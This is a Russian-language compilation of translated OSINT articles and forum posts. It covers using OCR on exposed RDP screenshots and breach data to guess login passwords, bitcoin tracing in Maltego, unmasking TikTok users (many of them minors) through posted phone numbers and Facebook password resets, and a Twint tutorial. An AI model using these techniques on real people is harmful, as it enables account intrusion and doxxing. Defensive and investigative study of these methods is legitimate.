req_json = json.loads(req.text)
for match in req_json['matches']:
text = match['opts']['screenshot']['text'].split("\n")
for line in text:
if "@" in line:
print(line)
Быстрый поиск одного из адресов электронной почты (полученных при выполнении
того кода, что я указал выше), показывает нам, что он был скомпрометирован в 7
различных утечках.
Это много, и даже если пароль на каждом сайте уникален, при этом он не был
сгенерирован случайным образом, можно найти схему, по которой владелец учетки
придумывает пароли на каждый сайт, и угадать его пароль от RDP.
Но стоит ли эксплуатировать эту машину для получения конфиденциальных данных?
Нам нужно выяснить, кто является владельцем адреса электронной почты. Быстрый
поиск в Google показывает, что это [УДАЛЕНО] инженер, окончивший [УДАЛЕНО].
Это один из способов, как вы можете найти владельца или данные от его учетной
записи от RDP, он не автоматизирован и завязан на ручном поиске по нескольким
причинам - OCR не всегда все корректно распознает и иногда содержит странные
символы, электронная почта может включать «...» вместо домена верхнего уровня,
потому что RDP предпочитает не показывать полное имя пользователя, если оно
неактивно. В конце концов, результаты должны быть проверены вручную, чтобы
определить конечные цели.
Reverse Image search & RDP
Это также необычная техника, о которой я никогда не слышал, - она непременно
утомительна, но может окупиться, подтвердив окончательные сомнения. Если на
машине не обнаружен какой-либо адрес электронной почты и она не связана с
какой-либо организацией, изображение профиля пользователя может помочь вам
определить владельца машины и потенциальную ценность с точки зрения наличия
секретных документов.
Нам нужно вырезать изображение профиля из скриншота с RDP и попытаться его найти на одном из сервисов обратного поиска по изображениям.
В данном случае мне пришлось проверить фотография сразу на нескольких сервисах
для получения нужных результатов. Люди, как и пароли, часто используют одну и
ту же свою фотографию на разных сайтах, в особенности на LinkedIn.
Имена пользователей RDP в формате имени и фамилии легче исследовать, - вы
должны искать учетные записи в социальных сетях и упоминания в Интернете
искомого человека, однако они не всегда уникальны, поэтому такой поиск лучше
комбинировать с поиском по изображению. В моем случае, изображения были
повторно использованы во многих социальных сетях, поэтому было легко
определить, кто является старшим владельцем продукта и генеральным директором
финансовой компании.
Заключение
OSINT широко используется не только правоохранительными органами и
исследователями, но и киберпреступниками. Под киберпреступниками я
подразумеваю актеров, которые нацелены на конкретных людей и компании, чтобы
получить как можно большую прибыль - конфиденциальные документы, данные
клиентов, интеллектуальную собственность или просто деньги. Зная их методы, вы
можете защитить себя и не стать легкой мишенью.
Для исследователей мониторинг незащищенных машин Bluekeep позволяет взглянуть на потенциальные компании, которые в скором времени скопроментируют и предсказать новостные заголовки.
оригинал - https://www.offensiveosint.io/offensive-osint-s01e01-osint-rdp/
перевод @ Moody для канала Cybred и Inside
Привет! Сегодня я решил поделиться с вами одной своей наработкой в сфере OSINT.
ПРОЛОГ:
В современном мире любой человек может осуществлять любые действия с помощью
deep и dark web. Разница в том, что дип-веб - это сектор скрытый от глаз, а
дарк-веб - это сектор конкретно посвящённый самому тяжёлому криминалу.
Убийства, наркотики, оружие, тероризм, хаккинг, кардинг, торговля людьми,
детьми, органами, пробив информации, решение вопросов, и много многое другое.
Напрашивается вопрос, что же, те кто занимаются криминалом в интернете за
анонимные крипто-валюты могут спать спокойно?
OSINT:
Это техника поиска информации из открытых источников. Дело в том, что
всемирную сеть пронизывают щупальца самых разнообразных поисковых систем,
словно вирус пронзающий человека своими щупальцами. Миллионы серверов,
миллиарды сайтов, пользователей. Все они каждый день оставляют в сети
результаты своих действий. И именно с помощью этих "улик" современные сыщики и
находят преступников. Как говорится всё новое - это хорошо забытое старое.
BITCOIN:
Крипта) На сегодня это слово знает каждый. Крипто-валюта. Некоторые сходят с
ума когда биткоин падает на пару тысяч долларов, неготорые делают на этом
деньги. Современные брокеры учатся предсказывать движение курса биткоинов,
используются самые разнообразные методики и формулы ученёх ещё 19 века. Теории
вероятности и многое другое.
Что кассается современных силовиков - для любого сотрудника силовых структур
известно, что на обыске нужно искать в первую очередь - биткоины! И для них
это настоящий праздник, когда они их находят. А они их находят. Довольно
часто.
Но! Но что же делать, если все что мы знаем - это счёт биткоин? Как быть?
CrystallBTC
Ещё лет 10 назад америкосы придумали устройство, которое помогало отследить
криптовалюту. Сегодня существует куча всяких "миксеров", которые помогают
запутать следы, так что коробочка 10-ти летней давности была успешно продана
немцам. Немцы ее тчательно обработали напильником и создали Crystal
Blockchain Analytics for Crypto Compliance
Этот сервис позволяет проанализировать весь мировой интернет и найти там
зацепки по вводным данным. То есть, <<Разложить>> биткоин.
Логика довольно простая. Берется счёт, и все транзакци с него и на него. А так
же все кошельки. И рано или поздно выстреливает тот кошелёк, который был
засвечен где-то на каком-то форуме, или на сайте обмена валют. Обмена валют.
Валют. что? да, внимательный читатель уже понял к чему я клоню
Дело в том, что биток нужно где-то обналичить. и именно в том месте и
находится самая большая опасность для тех, кто использует его в своих
криминальных целях.
В современнных развитых странах, разумеется, для этого нужно ещё тысячи
судебных решений, ордеров, и годы оперативно-сыскных работ, но у нас на
теретории Пост-Советского_Пространства все значительно примитивнее. Стоит
подписка, по мнению авторитетных источников, около 2000 у.е. в месяц. Но
далеко не каждый имеет право ее купить. Вернее, единицы. Почему? потому что
такое оружие в плохих руках может подорвать экономику не большого
государства...
MALTEGO:
Окей. Это все классненько, но что же делать нам, простым парням?
Юзаем Мальтего. Когда-то один ГУР-овец обмолвился за этот софт словом, я тогда
значения не предал. На днях я познакомился с этим инструментом лично, и просто
а***л... Я не буду говорить где найти и скачать это ПО - это можно сделать на
офф сайте. Взломать его не получится, придётся платить бабки. Сам фреймфорк
стоит около штуки баксов, каждый плагин от 500 баксов.
Довольно броский логотип. Слева у нас будет лишь малый перечень возможностей,
а справа - результаты их действий.
Написан софт на джава, не лагает даже на простом ноуте, и работает без
головняка сразу из коробки.
это самый простой граф. я разложил битки.
все просто, есть обменник. это реальный человек/организация имеющий легальный
бизнес, занимающийся обменом валют. в том числе и электронных.
Найти его сайт можно загуглив его счёт в гугле.
И есть форум, который предаставляет услуги размещения и рекламы
наркоторговцам. У форума есть счёт и не один. но мы их знаем, эти счета. и
раскладываем.
О чудо, тонкая красная нить ведёт нас прямо с оффициального счёта биткоин
обменщика, прямо на чёрный счёт нарко-форума. Который используют наркоторговцы
для оплаты услуг форума. Исходя из того, что транзакция не малая, то это
довольно крупный игрок.
Дальнешия действия вам скажет даже сотрудник патрульной полиции. "Давайте його
въебемо, чи шо!".....
в принципе, точно так же можно делать и в обратную сторону. Прити к вилкову и
попросить карты с\на которые осуществлялись транзы, номера телеофнов с\на
которые осуществляла комуникация. В общем, сухая оперская работа.
К счатью, мы не из патрульной полиции, так что наша работа куда интереснее.
Мало того, в мальтего есть так называемые "машины". Это такие наборы
трансформаторов, которые сделают всю работу по поиску за вас.
и это все в пробной версии.
Очень сильно доставляет озвучка продукта. Во время работы с программой
чувствуешь себя спец-агентом ANB.
разлетается клаудфлаер на тысячи мелких частей.
великое множество опций каждой единицы графа. Можно даже разложить историю
домена за всю жизнь. Такая инфа, на поик которой в ручную уйдёт не однин день.
даже добавить нечего. все в атоматическом режиме.
это то, что доступно нам в триал версии. Ну как доступно. Мы имеет возможность
пойти на сайт разработчика плагина, и на коленях слёзно попросить у него триал
плагина. получить апи кей. и попробовать.
А это то, что мы даже и просить не можем. Надо сначала внести символическую плату в 1000 баксов.
ЭПИЛОГ:
Вот и подошёл к концу наш с вами обзор данного продукта. Я надеюсь эта статья
кому-то понравится и поможет в службе\работе.
С уважением, Кот.
автор swagcat228
взял с codeby
Очень полезная памятка по OSINT.Содержится список сервисов для поиска информации.
Just now I found this start page for OSINT searches. OSINT
Привет, может у кого-нибудь есть хоть какая-то информация:
В данный момент занимаюсь поиском open source информации и возникает следующий
вопрос: Возможен ли поиск по номеру телефона в Instagram и Twitter?
Сам же сразу и отвечу на свой вопрос, что возможен. Twitter используется во
всем известном Lampyre, а Instagram в https://nuga.app/.
Знает ли кто-либо метод вручную воспроизвести поиск? Способ, описанный на
аккаунте нуги на хабре вообще не помог, потому что точно не показывает как
производить поиск.
С Twitter`ом немного легче. Находил версию приложения на андрой в которой была
возможность синхронизации контактов, сейчас же её убрали, а старую версию
заблокировали в связи с последними обновлениями приложения (в старых версих
злоумышленники могли получить контроль над учёткой и т.п.). Возникает вопрос
как Lampyre делают это сейчас?
Никаких готовых скриптов не нашёл(В основном-работа с самими твитами по
никнейму). Может кто-нибудь владеет хоть какой-то информацией по этому поводу?
Возможность использования вышеперечисленными сервисами баз данных отпадает,
так как пробивал только зарегистрированный аккаунт.
Буду очень благодарен за любую помощь. (Либо же за какой-либо совет
использования в OSINT целях других ГЛОБАЛЬНЫХ соц.сетях. Буду рад совету по
поиску в LinkedIn по email адресу, FaceBook и т.п.)
Доступный для скачивания более чем на 150 сервисах, используемый на 75 языках и имеющий более 1.5 миллиарда зарегистрированных пользователей, TikTok определенно взломал код термина «популярность» во всем мире.
TikTok используется преимущественно детьми и подростками, которые создают в нем короткие музыкальные клипы длиной от 3 до 15 секунд. Подавляющая часть контента состоит из цикличных видео с пением или танцами, однако некоторые загружают скринкасты из видеоигр, поведение животных и многое другое. Сервис, дающий такие возможности, позволяет людям проявлять творческий подход, создавать и делиться новым контентом.
Несмотря на то, что TikTok существует уже на протяжении нескольких лет и обрел большую популярность, я не видел, чтобы его ранее использовали в расследованиях. Хотя тут есть где разгуляться: школьники с видео, показывающие в какие школы они ходят, видео внутри и за пределами различных сооружений, номера телефонов и другая личная информация.
Номера телефонов
Многие пользователи TikTok, как уже упоминалось ранее, достаточно молоды и еще
не понимают последствий размещения своей личной информации на просторах
сервиса. Хотя, я не исключаю и остальных - есть взрослые люди, которые делают
то же самое. Я находил клипы, в которых люди делились своими Email'ами,
номерами телефонов, паспортными данными и множеством других личных
идентификаторов, таких как рост и возраст. Как правило, это происходит из-за
того, что они пытаются следовать трендам.
Также, как и на Youtube, существует вкладка "в тренде", только здесь она носит
название "Интересное". Как вы уже поняли, на ней находятся самые популярные
клипы. Но нас сейчас больше интересует функция поиска. При помощи нее можно
найти практически все что угодно и отсортировать по типу (лучшее,
пользователи, клипы, музыка, хэштеги).
Первое, что я ввел в поиске - фраза «Phone me» (позвони мне). Появилось огромное количество результатов с клипами, в описании которых люди оставляли свои номера телефонов. Иногда они закрывали одну цифру звездочкой - как будто её сложно подобрать (это мы сделаем чуть позже).
На скриншоте ниже вы можете увидеть, как человек указал номер в самом клипе.
Он показал его на долю секунды, поэтому, используя мобильное приложение,
захватить номер будет проблематично (из - за отсутствия возможности поставить
на паузу). Поэтому приходится прибегать к различным хитростям, реализацию
которых вы сможете найти в Google.
Аудиозаписи
Когда вы открываете видео с музыкальным треком, внизу, возле символа ноты,
появляется его название. Иногда проигрываются какие - то известные саундтреки,
а иногда - авторские, от самих пользователей (это не значит, что все они
создают свою музыку, названия присваивается в соответствии с окружением).
Например, на предыдущем изображении играет original sound - "alecgiacchetto".
Можно кликнуть на это название, чтобы получить остальные клипы с похожим
содержанием.
В оригинальном клипе звучала фраза:
«Здесь чуть ли не каждый публикует свой номер телефона, а после этого он разрывается звонками. Поэтому им приходится изменять его, но вы знаете, я не знаменит, поэтому можете набрать меня в FaceTime».
Как вы могли заметить, на момент создания скриншота, было найдено почти 20 000 таких клипов. И если вы будете искать эту звуковую дорожку в TikTok, вы можете быть почти на 100% уверены, что найдете кучу номеров.
Есть еще одна интересная звуковая дорожка, по которой можно искать удостоверения личности. Она прикреплена к клипам, на которых люди рассказывают о том, как они выглядят на фотографиях. И на этих клипах очень часто мелькают документы. Конечно, многие пытаются скрыть чувствительные данные, однако они редко закрывают свою подпись и дату рождения.
Электронные почты
Тут уже совсем просто. Если в поиске ввести домен электронной почты, вроде
«gmail.com» (или любой другой, тот же yandex.ru), или фразу, вроде "Write me",
то можно также найти множество адресов электронных почт.
Уточнение информации
Пришло время искать дополнительные сведения.
Начнем с номеров, в которых замазана одна цифра.
Существует множество способов сделать это, я расскажу вам о самых простых. В
примерах будут фигурировать британские номера, но это не имеет значения -
работает со всеми.
Первое и самое очевидное - функция сброса пароля на Facebook. В лучшем случае, с помощью этого способа вы сможете подобрать искомую цифру, в худшем - сузить область поиска.
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F342%2F1%2A-GAHAbIEIA-
TO3Vw9Pqocg.jpeg&hash=cc607854fb436246d5b5f4b5270aa098)
В моем случае цифра 6 была выигрышной. При попытке ввода остальных номеров,
Facebook отвечал, что учетная запись не существует. Хотя, теоретически,
аккаунт может принадлежать какому - нибудь другому человеку.
Следующий шаг - я взял и добавил этот номер в свой список контактов,
импортировал его в TikTok и нашел тот самый аккаунт, с которого и был выложен
клип с номером телефона. Я не могу показать вам его, поэтому просто оставлю
три первых буквы - "lil", те же самые, что на клипе выше.
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F320%2F1%2ABXrlId2ORJ-
ITc82VsJa3w.jpeg&hash=ee046703104c7df9a8639d9b0b73d229)
Помимо этого, свои контакты можно импортировать и в Snapchat (да и не только в
него). При помощи него я смог заполучить настоящее имя. «Aaaaaa» - это то, как
этот номер записан у меня в контактах, а подпись ниже - то, как сам
пользователь назвал себя в Snapchat. Теперь, когда я знаю настоящее имя, можно
приступить к поиску аккаунтов в других социальных сетях.
Еще один подход к поиску дополнительной информации - Lampyre. Это очередное
программное обеспечение, которое будет вашим лучшим другом при проведении
разведки. Моя любимая функция в нем - поиск по телефону и электронной почте.
Lampyre справляется со своей задачей на ура, находя точную информацию в
короткий срок.
На скриншоте ниже вы можете увидеть графы, построенные в результате поиска четырех сотовых из TikTok. Хотя я получил и не очень много информации, тем не менее я узнал о том, что владельцы зарегистрированы в WhatsApp.
Поиск по электронной почте. Здесь уже информации больше и вы можете видеть
часть номера, привязанного к Paypal и Apple, прямую ссылку на LinkedIn и
свидетельство того, что Email используется на Pinterest, Instagram и Spotify.
Вывод
Этот блог может продолжаться бесконечного с моими примерами поиска по звуковым
дорожкам и хэштегам. Тем не менее, я надеюсь, что вы в очередной раз
удостоверились в том, что в век информационных технологий необходимо соблюдать
цифровую гигиену и не разбрасываться своими данными.
[Источник](https://medium.com/@osint/tiktok-using-osint-to-discover-new-
leads-f7e6c27601d1)
перевод: @cybred
Люди, увлекающиеся OSINT, очень любят использовать социальные сети для разведки. Такие сайты, как Twitter, VK, Facebook (и другие социальные сети) представляют собой гигантские базы данных с множеством информации, поиском по содержимому и обновляемыми, в режиме реального времени, сведениями о миллионах пользователей. Не смотря на то, что в Twitter публикуется много слухов и домыслов, вводящих в заблуждение, существует и множество достоверных и эксклюзивных данных. Однако, поиск в этом массиве вручную может занимать невероятно много времени. Поэтому, нам на помощь приходят инструменты автоматизации. В данной статье будет рассмотрен как раз один из таких, под названием Twint.
Что может быть полезен Twitter
Как вы знаете, помимо поиска, OSINT состоит из несколько шагов и предполагает
структурирование, обработку информации и создание отчетов. Немаловажно и
планирование, являющееся первым шагом в поиске. Без понимания конкретной
ситуации, трудно (если не невозможно) разработать эффективный план того, как
будет проходить разведка.
Сначала исследователь должен составить список главных вопросов, ответы на которые он сможет получить в конце своего поиска, затем определить лучший источник информации для поиска этих ответов. После этого, необходимо проанализировать исходные данные на наличие скрытых подсказок, извлекая дополнительные сведения, для полного понимания ситуации. И, наконец, лишь после этого, можно будет приступить к поиску.
Сайты социальных сетей, такие как Twitter, могут предоставлять информацию, недоступную где-либо еще. Кроме стандартной информации, публикуемой официальными учетными записями компаний, Twitter также предоставляет личную информацию и наблюдения граждан в нужном нам месте и в нужное нам время.
К числу полезной информации, которую можно найти в Twitter, можно отнести:
Представьте, что у вас есть видео, которое показывает вам внутреннюю часть здания, в которое вы не можете физически войти; аппаратную конфигурацию системы, к которой вы не можете прикоснуться; или личные интересы потенциальной цели социальной инженерии. Подобные сведения позволяют выявлять слабые звенья в безопасности организаций.
Зачем использовать Twint
Пусть некоторые данные, содержащиеся в Twitter, и являются для нас ценными, но
их поиск и обработка могут занимать много времени. Помимо текста и времени
публикации, твит может содержать и другую информацию, например, геопозицию или
хэштеги. По этим (и другим) свойствам, мы делаем вывод, является ли тот или
иной твит для нас полезным. Вручную, как уже упоминалось ранее, анализ и
сохранение каждого твита займет уйму времени. Чтобы помочь исследователям
быстро отсеивать ненужные твиты, Twint оснащен поисковыми фильтрами, которые
можно комбинировать для отображения наиболее точной информации.
Хотите узнать какие твиты публиковал пользователь в прошлом году, рядом с определенным городом? Или, быть может, как та или иная группа пользователей предпочитала упоминать определенную тему? С правильной комбинацией поисковых флагов вы сможете реализовать это и многое другое.
Стоит также отметить, что в то время, как другие поисковые инструменты используют вашу учетную запись Twitter для отправки запросов через Twitter API, Twint этого не делает. Это позволяет обойти многие ограничения, в том числе, используя отправку запросов через прокси-сервера. Обладая способностью быстро генерировать текстовые файлы, json файлы и файлы с расширением .csv для архивации интересных твитов, Twint представляет собой отличный инструмент для судебной экспертизы или расследования.
Для более продвинутых пользователей Twint - это еще и библиотека Python, которая может быть использована для выполнения более нестандартных или сложных действий. Возможность создавать сценарии и масштабировать поиск в Twitter при помощи Twint, делает его простым, но одновременно мощным способом извлечения данных из социальной сети.
Шаг #1: Установка Twint
У вас должен быть установлен Python и менеджер пакетов pip3.
После этого открываем терминал и вводим:
Code:Copy to clipboard
pip3 install twint
Или же, если у вас возникли проблемы при установке Twint из PyPI (при помощи команды выше), вы можете клонировать Twint напрямую, с Github:
Code:Copy to clipboard
git clone https://github.com/twintproject/twint.git
cd twint
pip3 install . -r requirements.txt
Шаг #2: Справка по Twint
После завершения установки, вы можете запустить Twint и просмотреть список
доступных команд:
Code:Copy to clipboard
sudo twint -h
Использование:
Code:Copy to clipboard
python3 twint [опции]
Опции:
Code:Copy to clipboard
-h, --help Показать справку и выйти
-u USERNAME, --username USERNAME
Поиск твитов по имени пользователя
-s SEARCH, --search SEARCH
Поиск твитов по ключевому слову или фразе
-g GEO, --geo GEO Поиск твитов по координатам
--near NEAR Поиск твитов рядом с указанным городом
--location Показать местоположение пользователя
-l LANG, --lang LANG Поиск твитов на определенном языке
-o OUTPUT, --output OUTPUT
Сохранить результаты в текстовый файл
-t TIMEDELTA, --timedelta TIMEDELTA
Интервал времени для каждого запроса.
--year YEAR Отобразить твиты до указанного года.
--since SINCE Отобразить твиты, отправленные после определенной даты (Например: 2017-12-27).
--until UNTIL Отобразить твиты, отправленные до определенной даты (Например: 2017-12-27).
--email Отобразить твиты, содержащие адрес(а) электронной почты
--phone Отобразить твиты, содержащие номера телефонов
--verified Отображать твиты только от проверенных пользователей
--csv Запись результаты в файл с расширением .csv
--json Запись результаты в файл с расширением .json
--hashtags Вывести хэштеги в отдельный столбец
--userid USERID Получить UserID пользователя
--limit LIMIT Показать определенное количество твитов
--count Показать количество собранных твитов
--stats Показать количество ответов, ретвитов и лайков.
-db DATABASE, --database DATABASE
Хранить твиты в базе данных sqlite3
--to TO Поиск твитов, адресованных определенному пользователю
--all ALL Поиск всех твитов, связанных с определенным пользователем
--followers Получить список подписчиков пользователя
--following Получить список подписок пользователя
--favorites Получить список твитов, понравившихся пользователю
--proxy-type PROXY_TYPE
Указать тип прокси
--proxy-host PROXY_HOST
Указать ip-адрес прокси
--proxy-port PROXY_PORT
Указать порт прокси
--userlist USERLIST Указать пользователей из файла
--retweets Включить в отчет ретвиты пользователя
--format FORMAT Пользовательский формат вывода
--user-full Получить всю информацию о пользователе
--profile-full Более медленный, но эффективный метод сбора всей информации о пользователе
--store-pandas STORE_PANDAS
Сохранить твиты в DataFrame файле (Pandas).
--pandas-type [PANDAS_TYPE]
Тип DataFrame файла: HDF5 или Pickle (HDF5 по-умолчанию)
--debug Сохранять информацию для отладки
--resume RESUME Возобновить с <TwitID>
--videos Отобразить твиты с прикрепленным(и) видео
--images Отобразить твиты с прикрепленным(и) фото
--media Отобразить твиты с прикрепленным(и) фото или видео
--replies Показать ответы на тему
-pc PANDAS_CLEAN, --pandas-clean PANDAS_CLEAN
Автоматически очищать данные Pandas
--get-replies Получить все ответы на твит.
Шаг #3: Получение последних твитов пользователя
Теперь, когда мы ознакомились со способами фильтрации данных, можем приступить к расследованию. Представим себя на месте недавно нанятого сотрудника IRS, назначенного для проведения аудитов. Нам передали дело человека, обвиняемого в уклонении от уплаты налогов, и нам нужно решить, виновен ли он и, если виновен, - собрать компромат.
Имя в файле нашего первого аудита - Джон Макафи. После быстрого поиска, при помощи Google, мы находим его в Twitter под ником «officialmcafee».
Сначала мы можем получить информацию о самых последних твитах, используя флаг -u с указанием имени пользователя и -since с указанием текущей даты.
Code:Copy to clipboard
sudo twint -u officialmcafee --since 2020-01-03
Результат:
Code:Copy to clipboard
1096956729768767488 2020-01-03 18:17:19 PST <officialmcafee> Oh yeah!!
1096947035360636928 2020-01-03 17:38:48 PST <officialmcafee> Yes. Every last one. Every last one.
1096946784113516544 2020-01-03 17:37:48 PST <officialmcafee> I was so stoned in that photo. I remember tweeting that out . Can't recall why.
Шаг #4: Поиск доказательства в старых твитах
Джон Макафи недавно засветился в новостях после того, как написал в Twitter, что бежал из страны, опасаясь, что IRS планирует предъявить ему обвинение в уклонении от уплаты налогов. В начале года он также написал в Twitter, что не подавал налоговую декларацию в течение очень долгого времени.
Давайте найдем, в качестве доказательства, этот твит, указав тему "tax return" при помощи флага -s.
Code:Copy to clipboard
sudo twint -u officialmcafee -s "tax return" --since 2019-1-01
Результат:
Code:Copy to clipboard
1080953136985133062 2019-01-03 14:24:45 PST <officialmcafee>
I have not filed a tax return for 8 years. Why? 1: taxation is illegal. 2: I paid tens of millions already and received Jack Shit in services. 3. I'm done making money. I live off of cash from McAfee Inc. My net income is negative. But i am a prime target for the IRS. Here I am.
Отлично, теперь мы точно знаем, что он публиковал эту информацию и до сих пор не удалил её. Однако, этих доказательств нам мало и нужно найти еще. Делала ли наша цель какие-либо другие заявления, относительно уклонения от уплаты налогов? Давайте соберем их в один текстовый файл.
Для этого мы будем использовать флаг -o (для вывода в текстовый файл) и флаг -s для поиска по ключевому слову "taxes".
Code:Copy to clipboard
sudo twint -u officialmcafee -s "taxes" --since 2009-01-01 -o mcafeetax
Результат:
Code:Copy to clipboard
1097243822143213568 2019-02-17 13:18:07 PST <officialmcafee> Yes. Income taxes are illegal.
1096836632672653312 2019-02-16 10:20:06 PST <officialmcafee> I had cataract surgery 6 months ago and bright light still hurts my eyes. I will not take them off for you my friend. And taxes are unconstitutional. I will not pay. Why the fuck do you? Where are your fucking balls?
1092592264164134913 2019-02-04 17:14:29 PST <officialmcafee> Good God woman!! We're running from the fucking tax man. Why don't we just rename our private sessions. I've always favored "Bring that God-like scepter here babe".
1091156545398804481 2019-01-31 18:09:27 PST <officialmcafee> It's all I could afford. The IRS taxed the remaining pixels.
1090719204687429634 2019-01-30 13:11:37 PST <officialmcafee> Lmfao Deal. But my $15 mil is locked up in a swiss account due to a Swiss tax assessment. If you give me the 2 mil to unlock it, I will send you the 15. Really. You can trust me.
1088992872890802178 2019-01-25 18:51:48 PST <officialmcafee> The IRS survived withoit income tax for over a hundred years. Furst showed up during the civil War
1088462380051369985 2019-01-24 07:43:48 PST <officialmcafee> tltorally wrong. . Get real. It isn't a crime not to file taxes. Grand Juries aren't convened for failure to pay taxes. And if you believe taxes are good, you have purchased our government's propaganda. You are way worse off than me. We had no taxes before the Cuvil War.
1082710638365835264 2019-01-08 10:48:26 PST <officialmcafee> Good God!!!! Educate yourself! Thr U.S. had no income tax at all, with the exception of the Civil War, until 1913. We fucking did fine. This is what Im talking about. People are buying Government propaganda and eating it up. We font need income taxes.
1082709806031368192 2019-01-08 10:45:08 PST <officialmcafee> I have paid tens of millions in taxes in the past. Dont dare talk to me abour "orher tax payers".
1081582572461834240 2019-01-05 08:05:54 PST <officialmcafee> Income taxes are unconstitutional. That's my beef. You may not mind being controlled by a corrupt givernment but i do
1081309939841286144 2019-01-04 14:02:34 PST <officialmcafee> We declared our independence from Britain and fought a bloody war to escape burdensome taxes, yet here we are, less than 250 years later, being burdened by income taxes that are more crushing than anythung rhe British dreamed of. Free yourselves people! https://www.ccn.com/crypto-shill-john-mcafee-i-havent-filed-a-tax-return-in-8-years/ …
1081122728005066752 2019-01-04 01:38:39 PST <officialmcafee> Fox News reported that i don't pay taxes. The IRS is angry (and corrupt). They will strike using law, twisted by 'their' facts, as a club. My offense is small and won't do. inferences of conspiracy or foreign collusion, or something, will come. I promise. https://www.foxnews.com/us/john-mcafee-trashes-irs-in-series-of-tweets …
1081019828658495488 2019-01-03 18:49:46 PST <officialmcafee> We had no income tax in the U.S. prior to the Civil War. There are uncountable alternativrs. Look it up and educate yourself.
1081017561695903744 2019-01-03 18:40:45 PST <officialmcafee> No sir. We had no income taxes prior to the Civil War and yet we were a world powet. There are thousands of ways to fund a givernment besides income taxes. Pay for service is one way: pay for road use by mileage, pay to access National parks, etc.,
1080988662077247488 2019-01-03 16:45:55 PST <officialmcafee> My Crypto goals drive the IRS mad. Privacy coins will obsolete income taxes. Can't tax money you cant see, and I promote this as a good thing. The SEC is legally failing in their power grab so It's up to the IRS now to silence me. I've called them out. They will come. You'll see.
1080953136985133062 2019-01-03 14:24:45 PST <officialmcafee> I have not filed a tax return for 8 years. Why? 1: taxation is illegal. 2: I paid tens of millions already and received Jack Shit in services. 3. I'm done making money. I live off of cash from McAfee Inc. My net income is negative. But i am a prime target for the IRS. Here I am.
1080854344331939840 2019-01-03 07:52:11 PST <officialmcafee> I'm done trashing the SEC. Let's move on to the IRS - the agency that takes from you an average of three months of your labor each year. First - taxation is theft. It is unconstitutional. Prior to the civil war there was no income tax, yet we managed. Stay tuned for the truth.
1071899943680512001 2018-12-09 14:50:36 PST <officialmcafee> And that does'n happen to me constantly??? But ask-- who do the Feds work for? Me, as much as anybody since I've paid the Feds, through taxes, hundreds of millions of dollars for services I have never received. Every Fed burstung through the door will get a "Past Due" notice
1033463922735624193 2018-08-25 14:19:34 PST <officialmcafee> I have made enough in my lifetime to have paid over a quarter of a billion dollars in taxes. I do not have to account for my money anymore. Some of the dollars I spend, are from the millions I made in 1987, never mind the hundreds of millions over the subsequent 10 years.
997495042347622400 2018-05-18 08:12:05 PST <officialmcafee> The SEC created a fake ICO called the Howeycoin, where the "Buy" button takes you to a page which discourages the purchase of cryptocurrencies. This is where your tax dollars are going - into deception, subterfuge and a desperate attempt to save the SEC. https://www.howeycoins.com/index.html#team
951689398135001089 2018-01-11 21:36:48 PST <officialmcafee> Tax writeoffs.
947326031890911233 2017-12-30 20:38:21 PST <officialmcafee> When I follow someone, God gives them a new Bentley Azure. Tax free.
947325176701706241 2017-12-30 20:34:57 PST <officialmcafee> When I follow someone God himself comes down and gives them a Bentley Azure. Tax free. It used to be Ford Focus. Don't know why the upgrade.
947007111011151872 2017-12-29 23:31:04 PST <officialmcafee> As I said earlier ..... When I follow someone God himself comes down and gives them a new Bentley Azure ..... Tax free.
947005611253919744 2017-12-29 23:25:06 PST <officialmcafee> I did. But I don't believe your name is Tom. You realize, of course, that when I follow people, God himself comes down and blesses them - giving each of them a Bentley Azure - tax free.
939924816664121345 2017-12-10 10:28:33 PST <officialmcafee> Good God! Do I have to spell it out? Well ... No taxes, no regulatory problems, no traceable income, no tax accountant costs, etc,etc,etc
644436140183973888 2015-09-17 02:02:03 PST <officialmcafee> My policies now posted https://mcafee16.com/issues/ #ForeignPolicy #drugs #immigrants #tax #educate #economy #cyber +more pic.twitter.com/ugCnhKEBsL
Ух ты. Он действительно ненавидит налоги. Теперь у нас есть файл с названием "mcafeetax", содержащий все твиты, которые мы только что просмотрели о налогах.
Если бы я работал в правоохранительных органов, перед встречей с ним, мне было бы интересно узнать, может ли он быть вооружен. Быть может, Twitter ответит на этот вопрос?
Шаг #5: Экспорт доказательств и метаданных
Давайте попробуем поискать его твиты об оружии в прошлом году. Для этого мы
используем ключевое слово "gun" и ключ --media, чтобы оставить только посты с
изображениями или видео.
Далее мы сохраним найденные доказательства в CSV файл под названием «mcafeeguns».
Code:Copy to clipboard
sudo twint -u officialmcafee -s "gun" --since 2018-01-01 --media -o mcafeeguns --csv
Результат:
Code:Copy to clipboard
1071009885645627392 2018-12-07 03:53:49 PST <officialmcafee> U jumped the gun when I divulged the Skycoin video that someone shot during the week of revelry at my place. Seems there is a remix now. Great improvements plus without the shot of Hayden with his dick hanging out. (link: https://youtu.be/R5q7_UWKcDg ) http://youtu.be/R5q7_UWKcDg
1022223220861272067 2018-07-25 13:53:02 PST <officialmcafee> ANTI-GUN FOLK: READ NO FURTHER. Now -- guns don't kill people. Bullets kill people. And if you want to kill people with a handgun, no bullet beats the FN-57. High velocity, flat trajectory, tumbles on impact, making massive exit wounds. I urge all all if my security to use it. pic.twitter.com/P5hu2Hfur6
1007413614205120512 2018-06-14 17:04:57 PST <officialmcafee> This look like a water gun? pic.twitter.com/VKoh01GuCg
1000389938200895489 2018-05-26 07:55:22 PST <officialmcafee> About my guns pic.twitter.com/MIwq5K6amN
999482149190492160 2018-05-23 19:48:08 PST <officialmcafee> Bull shit. When am I not holding guns or surrounded by guards pic.twitter.com/fawZh7gBRv
999480884003786752 2018-05-23 19:43:06 PST <officialmcafee> When am I not in a photo with guns and guards? pic.twitter.com/iNC343Yq5I
971322857363005440 2018-03-07 01:53:10 PST <officialmcafee> You ask -- Why do I have guns? Dateline: Amy confesses to trying to kill me: http://www.nbcnews.com/video/dateline/50515302 … Newsweek: Wife confesses to cooperating with Cartel: http://www.newsweek.com/topic/john-mcafee … USA Today: War with Cartel: https://www.google.com/amp/s/amp.usatoday.com/amp/21712017 … Google: Tons of stories. Any questions? pic.twitter.com/ODSm4wHz1K
965249086562734080 2018-02-18 07:38:10 PST <officialmcafee> People asked why I have guns in the corner of my previous post. Anyone want to explain why we have the right to bear arms in America? pic.twitter.com/NtT2Fg9qnq
В созданном CSV файле также содержится множество метаданных.
Найденные медиа также сохраняются. Открыв один из постов, я вижу, что этот
человек действительно хорошо вооружен.
